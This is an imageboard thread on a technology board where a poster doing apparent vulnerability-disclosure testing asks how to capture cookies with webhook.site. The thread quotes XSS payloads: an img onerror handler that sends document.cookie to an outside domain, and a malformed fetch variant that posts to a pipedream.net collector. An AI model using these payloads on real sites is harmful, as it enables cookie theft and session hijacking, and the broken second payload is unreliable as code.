Lite mode. Switch to Full
invert_colors
NeoNeo LightDefaultLow SaturationWashed OutKrautchanHamstakillaMintboardBronnenFutaba
logout
/tech/
/tech/
/int/ - Son of KC/map/ - Map Board/h3d/ - 3d Board/gpt/ - Bernd GPT/o/ - About/ban/ - Ban appeals/b/ - Random/c/ - Court/d/ - Images/de/ - Deutsch/fit/ - Fitness/kb/ - Dating Apps & Related/ml/ - Military/mu/ - Music/oc/ - Original Content/out/ - Outdoor/pol/ - Política/ru/ - Русскоязычная/s/ - Sports/sci/ - Science/sht/ - Shit Talk/stalin/ - Capitalism Bashing/t/ - Torrents/tech/ - Technology/tv/ - Movies and Television/v/ - Video Games/war/ - War/z/ - Anime/bog/ - Bog/igor/ - Igor Blog
Post a Replyarrow_backarrow_downward
GermanyBernd2024-11-04 10:02:30 · 2yNo. 325734reply
pepe-thinking(02).png
pepe-thinking(02)
image/png 258.16 KB
I'm doing an XSS attack for a VDP and I discovered a vulnerability, and I've got a question. I want to prove the impact of it. So basically I used an image tag with an event handler. greather than siggn; img src=x onerror=this.src='https://domain/?'+document.cookie> so I am trying to prove, that it is possible to steal cookies with this payload, but i don't have burp, cuz I am broke so I used webhook.site Where can I find the cookie on webhook.site? Can I see the full request?
×
BelarusBernd2024-11-04 10:33:36 · 2yNo. 325737reply
just do a post request using fetch with the cookie and it should be on the list on the site
×
MoscowBernd2024-11-04 10:40:14 · 2yNo. 325738reply
psssssst
 
 
are you sure you want to help forfree9999
×
BelarusBernd2024-11-04 10:45:08 · 2yNo. 325744reply
i dont even care anymore....................................
×
GermanyBernd2024-11-04 11:24:16 · 2yNo. 325752reply
thanks
×
BerndBernd2024-11-04 11:26:52 · 2yNo. 325753reply
Are you Russian h4ckers?
×
GermanyBernd2024-11-04 15:52:05 · 2yNo. 325779reply
like that?
 
lt;img src=x onerror="fetch('https://eonv170bn8s1evr.m.pipedream.net'){ method: "POST", headers: { "content-type": "API-Key", }, credentials: "include", }">
×
×
/tech/Post a Replyarrow_backarrow_upward